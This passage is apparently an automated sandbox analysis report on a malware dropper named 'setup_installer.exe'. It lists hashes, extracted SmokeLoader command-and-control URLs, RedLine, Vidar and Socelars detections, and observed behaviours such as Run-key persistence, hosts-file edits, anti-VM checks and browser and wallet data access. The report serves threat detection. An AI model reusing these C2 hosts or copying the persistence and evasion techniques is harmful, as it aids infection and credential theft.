Analysis
-
max time kernel
906s -
max time network
1815s -
platform
windows11_x64 -
resource
win11 -
submitted
22-10-2021 14:39
Static task
static1
Behavioral task
behavioral1
Sample
setup_installer.exe
Resource
win7-ja-20211014
Behavioral task
behavioral2
Sample
setup_installer.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_installer.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_installer.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_installer.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_installer.exe
Resource
win10-en-20210920
General
-
Target
setup_installer.exe
-
Size
3.9MB
-
MD5
c46908531375bab2af1aa2868ba6b7dd
-
SHA1
6af36f1f26d1d79710fb99f020b9035c3caa11b5
-
SHA256
3e74a31c3e282ab53d039b04905ea50cafacaf3d293656e1e05c0e9156b689fd
-
SHA512
fe7f9431293fba92ca6482b1ae181b30d54a72455bf9135f533583a78322082eaace64f760ee0fdd173601d8ac7047122528d5456b9b474fd89de9ff8d8fe6ee
Malware Config
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
Extracted
icedid
1875681804
Signatures
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exerundll32.exeschtasks.exerundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5504 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7748 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7272 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7884 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2544 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4696 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4820 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6232 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7608 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2424 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2420 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5760 4908 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5828 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9084 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 13580 4908 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral4/memory/5512-342-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5520-344-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5528-343-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri055cc2a6e65.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri055cc2a6e65.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exegcleaner.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exew32tm.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 3448 created 3564 3448 WerFault.exe Fri0541e16ce794d258f.exe PID 5572 created 2292 5572 WerFault.exe mp7Vk_cGSKQF_a2Ibkt1jyyO.exe PID 5732 created 5556 5732 WerFault.exe rundll32.exe PID 6388 created 5536 6388 WerFault.exe WerFault.exe PID 6444 created 4208 6444 tPwENUt61mkw9jaaKJZITT4q.exe PID 6636 created 5772 6636 WerFault.exe oJRm70Dm9j5lSYZ6MOMZucpS.exe PID 6780 created 5740 6780 msedge.exe lDYn6p91yzfKElN48ASYj3I8.exe PID 6536 created 4036 6536 WerFault.exe F3GlpsiIrfzDVicX03Ub1cxP.exe PID 6920 created 3384 6920 WerFault.exe 0XwBVgDT3ezgJG3_0dQD72qz.exe PID 7056 created 4980 7056 WerFault.exe GEmrIdAuJTC4SU6UyNpLIyk4.exe PID 6768 created 6732 6768 WerFault.exe jTpJDXJu0rO2dvjCK2d8f8y3.exe PID 3956 created 3948 3956 gcleaner.exe Jj7boAeoG56W1zy74ULeu0nk.exe PID 6960 created 6708 6960 WerFault.exe usXF9zucDbMhT_78yRVLnT_L.exe PID 7308 created 3060 7308 WerFault.exe taskkill.exe PID 7424 created 1332 7424 WerFault.exe d6sHYV6XlWgpQzAIDX6Lbn0g.exe PID 7644 created 7248 7644 WerFault.exe B4y_EASV2PYiiQ2KLAuWbSfl.exe PID 7792 created 7256 7792 w32tm.exe Fmj0Lz0Ez3X0ixz2HwOQLRlN.exe PID 6052 created 3716 6052 WerFault.exe 6xMN6qpuEr9zi2l7O2Z_5f9r.exe PID 2208 created 7120 2208 WerFault.exe rundll32.exe PID 5832 created 3240 5832 WerFault.exe rundll32.exe PID 5940 created 6436 5940 WerFault.exe 96DF.exe PID 2744 created 7864 2744 WerFault.exe 173C.exe PID 5536 created 19192 5536 WerFault.exe GcleanerEU.exe PID 8128 created 3956 8128 WerFault.exe gcleaner.exe PID 5672 created 2012 5672 WerFault.exe GcleanerEU.exe PID 6784 created 2108 6784 WerFault.exe rundll32.exe PID 8948 created 8828 8948 WerFault.exe gcleaner.exe PID 9160 created 9112 9160 WerFault.exe rundll32.exe PID 10880 created 10680 10880 WerFault.exe GcleanerEU.exe PID 12896 created 12672 12896 WerFault.exe gcleaner.exe PID 13648 created 13592 13648 WerFault.exe rundll32.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5740-442-0x0000000000E90000-0x0000000000F66000-memory.dmp family_vidar behavioral4/memory/4036-441-0x0000000000EC0000-0x0000000000F96000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 43 IoCs
Processes:
cmd.exeMsiExec.exeflow pid process 189 6952 cmd.exe 206 6952 cmd.exe 218 6952 cmd.exe 1570 9832 MsiExec.exe 1603 9832 MsiExec.exe 1616 9832 MsiExec.exe 1624 9832 MsiExec.exe 1636 9832 MsiExec.exe 1654 9832 MsiExec.exe 1665 9832 MsiExec.exe 1670 9832 MsiExec.exe 1681 9832 MsiExec.exe 1693 9832 MsiExec.exe 1702 9832 MsiExec.exe 1709 9832 MsiExec.exe 1718 9832 MsiExec.exe 1730 9832 MsiExec.exe 1747 9832 MsiExec.exe 1751 9832 MsiExec.exe 1762 9832 MsiExec.exe 1770 9832 MsiExec.exe 1775 9832 MsiExec.exe 1780 9832 MsiExec.exe 1792 9832 MsiExec.exe 1811 9832 MsiExec.exe 1820 9832 MsiExec.exe 1835 9832 MsiExec.exe 1848 9832 MsiExec.exe 1863 9832 MsiExec.exe 1879 9832 MsiExec.exe 1884 9832 MsiExec.exe 1888 9832 MsiExec.exe 1896 9832 MsiExec.exe 1905 9832 MsiExec.exe 1911 9832 MsiExec.exe 1916 9832 MsiExec.exe 1921 9832 MsiExec.exe 1938 9832 MsiExec.exe 1946 9832 MsiExec.exe 1954 9832 MsiExec.exe 1971 9832 MsiExec.exe 1982 9832 MsiExec.exe 1998 9832 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
DYbALA.exeDYbALA.exeDYbALA.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_install.exeFri05beb1e355.exeFri0575b7d291a755f8.exeFri05a277b9a3d2.exeFri055cc2a6e65.exeFri05851d7f13.exeFri05f84fa77402bf.exeFri05890d11cdb13f95e.exeFri053f5694ea31c9a.exeFri051e1e7444.exeFri0541e16ce794d258f.exeFri05b5df5106928d62.exeFri05cc28ce70b.exeFri05eeb2dae7b88520a.exeFri05eeb2dae7b88520a.tmpFri05eeb2dae7b88520a.exeFri05eeb2dae7b88520a.tmpsh4hflfTIu9X6CgvU_tIR6x4.exeo6ds5QGxKUUqphYqwpp1NMcj.exeEiV4.ExeWerFault.exeLzmwAqmV.exepostback.exe6592176.exeBCleanSoft82.exeFri05f84fa77402bf.exeFri053f5694ea31c9a.exeFri05a277b9a3d2.exeinst1.exe8474982.exedWSLTf9aevg5YZImfbAMqQKt.exetPwENUt61mkw9jaaKJZITT4q.exefpnxpWGlulH21GfBlEce4NmL.exeGEmrIdAuJTC4SU6UyNpLIyk4.exedjOzqaDxuN4ftzSDioAOukfA.exeF3GlpsiIrfzDVicX03Ub1cxP.exeWerFault.exeJj7boAeoG56W1zy74ULeu0nk.exeAzLsZLp_D4ayNkuN341bjJBG.exelDYn6p91yzfKElN48ASYj3I8.exe0XwBVgDT3ezgJG3_0dQD72qz.exeik4j_W_ltwNfFlsIyokyL3WC.exelDmYLXyNa7LPLO_m9F0WRNSp.exeWerFault.exevZtRm6RPNwcqvnanVev4uQep.exexjdvs1LgMYNI2r3DKw2G3P7q.exe907323.exeaDpjh1ksoewfrV4qxYgfCwyx.exeusXF9zucDbMhT_78yRVLnT_L.exejTpJDXJu0rO2dvjCK2d8f8y3.exekFymlZ9bOtriLI_9SMXatxO1.exeoJRm70Dm9j5lSYZ6MOMZucpS.exe4BqjvA9G3qh1x_0g7cfYqK0k.exe6fDHT2tUxULVjUTvpyzQ9uGY.exemp7Vk_cGSKQF_a2Ibkt1jyyO.exe0COn9mQq2c06dY1_MSTZTeAr.exex5yjjKUdFt2OAlDQL7_fYMPj.exeMcdwmM9yiVXViMdMLT2CYjKO.exeGYm5cBJ0pNxSWLyCMO8rktun.exeYwfX9VEMCM0I8tKzQEPvHqNf.exe96DF.executm3.exeDownFlSetup999.exeinst3.exepid process 3180 setup_install.exe 4972 Fri05beb1e355.exe 4272 Fri0575b7d291a755f8.exe 420 Fri05a277b9a3d2.exe 2292 Fri055cc2a6e65.exe 2208 Fri05851d7f13.exe 5036 Fri05f84fa77402bf.exe 3548 Fri05890d11cdb13f95e.exe 3304 Fri053f5694ea31c9a.exe 3272 Fri051e1e7444.exe 3564 Fri0541e16ce794d258f.exe 3344 Fri05b5df5106928d62.exe 4588 Fri05cc28ce70b.exe 1492 Fri05eeb2dae7b88520a.exe 2024 Fri05eeb2dae7b88520a.tmp 480 Fri05eeb2dae7b88520a.exe 3420 Fri05eeb2dae7b88520a.tmp 5240 sh4hflfTIu9X6CgvU_tIR6x4.exe 5288 o6ds5QGxKUUqphYqwpp1NMcj.exe 5564 EiV4.Exe 5832 WerFault.exe 5900 LzmwAqmV.exe 5936 postback.exe 6108 6592176.exe 5152 BCleanSoft82.exe 5512 Fri05f84fa77402bf.exe 5528 Fri053f5694ea31c9a.exe 5520 Fri05a277b9a3d2.exe 2348 inst1.exe 2168 8474982.exe 2944 dWSLTf9aevg5YZImfbAMqQKt.exe 4208 tPwENUt61mkw9jaaKJZITT4q.exe 3276 fpnxpWGlulH21GfBlEce4NmL.exe 4980 GEmrIdAuJTC4SU6UyNpLIyk4.exe 2228 djOzqaDxuN4ftzSDioAOukfA.exe 4036 F3GlpsiIrfzDVicX03Ub1cxP.exe 5536 WerFault.exe 3948 Jj7boAeoG56W1zy74ULeu0nk.exe 5320 AzLsZLp_D4ayNkuN341bjJBG.exe 5740 lDYn6p91yzfKElN48ASYj3I8.exe 3384 0XwBVgDT3ezgJG3_0dQD72qz.exe 5644 ik4j_W_ltwNfFlsIyokyL3WC.exe 3116 lDmYLXyNa7LPLO_m9F0WRNSp.exe 5184 WerFault.exe 6008 vZtRm6RPNwcqvnanVev4uQep.exe 1652 xjdvs1LgMYNI2r3DKw2G3P7q.exe 1944 907323.exe 3832 aDpjh1ksoewfrV4qxYgfCwyx.exe 5700 usXF9zucDbMhT_78yRVLnT_L.exe 3440 jTpJDXJu0rO2dvjCK2d8f8y3.exe 4252 kFymlZ9bOtriLI_9SMXatxO1.exe 5772 oJRm70Dm9j5lSYZ6MOMZucpS.exe 2272 4BqjvA9G3qh1x_0g7cfYqK0k.exe 4084 6fDHT2tUxULVjUTvpyzQ9uGY.exe 2292 mp7Vk_cGSKQF_a2Ibkt1jyyO.exe 4044 0COn9mQq2c06dY1_MSTZTeAr.exe 4844 x5yjjKUdFt2OAlDQL7_fYMPj.exe 6164 McdwmM9yiVXViMdMLT2CYjKO.exe 6220 GYm5cBJ0pNxSWLyCMO8rktun.exe 6324 YwfX9VEMCM0I8tKzQEPvHqNf.exe 6436 96DF.exe 6592 cutm3.exe 6616 DownFlSetup999.exe 6628 inst3.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
6fDHT2tUxULVjUTvpyzQ9uGY.exesmss.exe7383269.exe6592176.exex5yjjKUdFt2OAlDQL7_fYMPj.exe0COn9mQq2c06dY1_MSTZTeAr.exe8884366.exe5795695.exekFymlZ9bOtriLI_9SMXatxO1.exefpnxpWGlulH21GfBlEce4NmL.exe1371155.exedjOzqaDxuN4ftzSDioAOukfA.exe4BqjvA9G3qh1x_0g7cfYqK0k.exe8474982.exeCompPkgSrv.exe7C9F.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6fDHT2tUxULVjUTvpyzQ9uGY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7383269.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6592176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion x5yjjKUdFt2OAlDQL7_fYMPj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0COn9mQq2c06dY1_MSTZTeAr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8884366.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5795695.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kFymlZ9bOtriLI_9SMXatxO1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fpnxpWGlulH21GfBlEce4NmL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1371155.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fpnxpWGlulH21GfBlEce4NmL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion djOzqaDxuN4ftzSDioAOukfA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4BqjvA9G3qh1x_0g7cfYqK0k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4BqjvA9G3qh1x_0g7cfYqK0k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8474982.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8474982.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5795695.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1371155.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CompPkgSrv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7C9F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7C9F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6fDHT2tUxULVjUTvpyzQ9uGY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion x5yjjKUdFt2OAlDQL7_fYMPj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kFymlZ9bOtriLI_9SMXatxO1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion djOzqaDxuN4ftzSDioAOukfA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6592176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0COn9mQq2c06dY1_MSTZTeAr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7383269.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8884366.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CompPkgSrv.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
fpnxpWGlulH21GfBlEce4NmL.exesmss.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine fpnxpWGlulH21GfBlEce4NmL.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine smss.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeFri05eeb2dae7b88520a.tmpFri05eeb2dae7b88520a.tmprundll32.exe0ZczbYCvQV_ikxNuZbNQ7AKv.tmpGiF4PhaN6EmQoBJJNwjurt9l.exemsiexec.exeNARe8zjEE0fBGUmV6IDsSwRu.tmpGy4Fi8em_KLp3z6GEiMCww2A.tmpV72hLI8G_m6CbhQN1gHdnJbA.exeZM2sQl0eWse_3_2e51qEoUc8.exesetup.exesetup.exesetup.exerundll32.exerundll32.exemsiexec.exeinstaller.exeautosubplayer.exerundll32.exeMsiExec.exemsiexec.exerundll32.exeautosubplayer.exeCalculator.exeCalculator.exeMsiExec.exepid process 3180 setup_install.exe 3180 setup_install.exe 3180 setup_install.exe 3180 setup_install.exe 3180 setup_install.exe 3180 setup_install.exe 3180 setup_install.exe 2024 Fri05eeb2dae7b88520a.tmp 3420 Fri05eeb2dae7b88520a.tmp 5556 rundll32.exe 6448 0ZczbYCvQV_ikxNuZbNQ7AKv.tmp 5452 GiF4PhaN6EmQoBJJNwjurt9l.exe 5452 GiF4PhaN6EmQoBJJNwjurt9l.exe 1976 msiexec.exe 1976 msiexec.exe 5452 GiF4PhaN6EmQoBJJNwjurt9l.exe 5452 GiF4PhaN6EmQoBJJNwjurt9l.exe 5452 GiF4PhaN6EmQoBJJNwjurt9l.exe 8060 NARe8zjEE0fBGUmV6IDsSwRu.tmp 8156 Gy4Fi8em_KLp3z6GEiMCww2A.tmp 5452 GiF4PhaN6EmQoBJJNwjurt9l.exe 2848 V72hLI8G_m6CbhQN1gHdnJbA.exe 7112 ZM2sQl0eWse_3_2e51qEoUc8.exe 2848 V72hLI8G_m6CbhQN1gHdnJbA.exe 7112 ZM2sQl0eWse_3_2e51qEoUc8.exe 7112 ZM2sQl0eWse_3_2e51qEoUc8.exe 2848 V72hLI8G_m6CbhQN1gHdnJbA.exe 7112 ZM2sQl0eWse_3_2e51qEoUc8.exe 5432 setup.exe 2848 V72hLI8G_m6CbhQN1gHdnJbA.exe 5432 setup.exe 4264 setup.exe 4264 setup.exe 6988 setup.exe 6988 setup.exe 7120 rundll32.exe 3240 rundll32.exe 4008 msiexec.exe 4008 msiexec.exe 19280 installer.exe 19280 installer.exe 2204 autosubplayer.exe 2108 rundll32.exe 19280 installer.exe 8316 MsiExec.exe 8316 MsiExec.exe 8700 msiexec.exe 8700 msiexec.exe 2204 autosubplayer.exe 9112 rundll32.exe 9028 autosubplayer.exe 6988 setup.exe 5432 setup.exe 5432 setup.exe 6988 setup.exe 9660 Calculator.exe 9648 Calculator.exe 6988 setup.exe 5432 setup.exe 9660 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe 9660 Calculator.exe 9832 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 19 IoCs
Processes:
setup.exe907323.exefpnxpWGlulH21GfBlEce4NmL.exeDYbALA.exesetup.exesetup.exeDYbALA.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 907323.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\8884366 = "\"C:\\Boot\\en-US\\8884366.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\x5yjjKUdFt2OAlDQL7_fYMPj = "\"C:\\Users\\Admin\\Pictures\\Adobe Films\\HCXOFRiAMR5KOhUwU_ppv7b9\\x5yjjKUdFt2OAlDQL7_fYMPj.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Qylaxyhyfae.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Transmissibility = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\29765\\18\\Transmissibility.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\cutm3 = "\"C:\\Program Files (x86)\\Company\\NewProduct\\Uninstall\\cutm3.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\All Users\\Microsoft OneDrive\\setup\\services.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Saejydiledy.exe\"" DYbALA.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\8474982 = "\"C:\\Users\\Admin\\AppData\\Roaming\\907323\\8474982.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\MP4SDECD\\conhost.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\PerfLogs\\smss.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sh4hflfTIu9X6CgvU_tIR6x4 = "\"C:\\Users\\Admin\\Pictures\\Adobe Films\\lDYn6p91yzfKElN48ASYj3I8\\sh4hflfTIu9X6CgvU_tIR6x4.exe\"" fpnxpWGlulH21GfBlEce4NmL.exe -
Checks for any installed AV software in registry 1 TTPs 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
6592176.exe6fDHT2tUxULVjUTvpyzQ9uGY.exe0COn9mQq2c06dY1_MSTZTeAr.exe7383269.exekFymlZ9bOtriLI_9SMXatxO1.exe1371155.exe8884366.exe7C9F.exe4BqjvA9G3qh1x_0g7cfYqK0k.exex5yjjKUdFt2OAlDQL7_fYMPj.exe8474982.exedjOzqaDxuN4ftzSDioAOukfA.exe5795695.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6592176.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6fDHT2tUxULVjUTvpyzQ9uGY.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0COn9mQq2c06dY1_MSTZTeAr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7383269.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kFymlZ9bOtriLI_9SMXatxO1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1371155.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8884366.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7C9F.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4BqjvA9G3qh1x_0g7cfYqK0k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA x5yjjKUdFt2OAlDQL7_fYMPj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8474982.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA djOzqaDxuN4ftzSDioAOukfA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5795695.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
